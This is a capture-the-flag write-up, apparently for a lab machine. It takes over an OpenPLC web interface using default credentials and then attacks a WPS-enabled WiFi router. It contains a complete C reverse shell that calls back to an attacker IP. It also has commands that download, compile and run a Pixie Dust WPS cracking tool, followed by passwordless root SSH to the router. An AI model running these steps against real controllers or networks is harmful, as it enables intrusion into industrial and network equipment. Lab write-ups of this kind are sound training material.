User flag#
The only interesting thing is running on port 8080: http://10.129.175.20:8080/. OpenPLC which uses default credentials openplc:openplc.
To exploit this thing, navigate to the Hardware tab and append the following C code to the Hardware Layer Code Box:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| #include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = 4711;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("10.10.14.158");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"bash", NULL};
execvp("bash", argv);
return 0;
}
|
Root flag#
This was pretty easy but has nothing to do with wifi, so there must be more to this box. We are root and there is no root flag. This may be the part about wifi so let’s scan for wifis:
It should find a wifi name “plcrouter” that has WPS enabled, one of the most shitty things you can enable on a wifi router… This brought Pixiedust into my mind immediately. I already exploited this vulnerability at work so it was pretty straightforward for me.
Get the C file from OneShot-C and move it to the machine, compile it and run it:
1
2
3
4
| curl 10.10.14.143/wifi/OneShot-C/oneshot.c > oneshot.c
gcc oneshot.c -o oneshot
./oneshot -i wlan0 -K
# select wifi "plcrouter"
|
1
2
3
4
5
| wpa_passphrase plcrouter 'NoWWEDoKnowWhaTisReal123' > psk
wpa_supplicant -B -c psk -i wlan0
# assing ip to interface
ifconfig wlan0 192.168.1.5 netmask 255.255.255.0
|
Try to SSH to the router. There’s no password for the root account on OpenWRT…
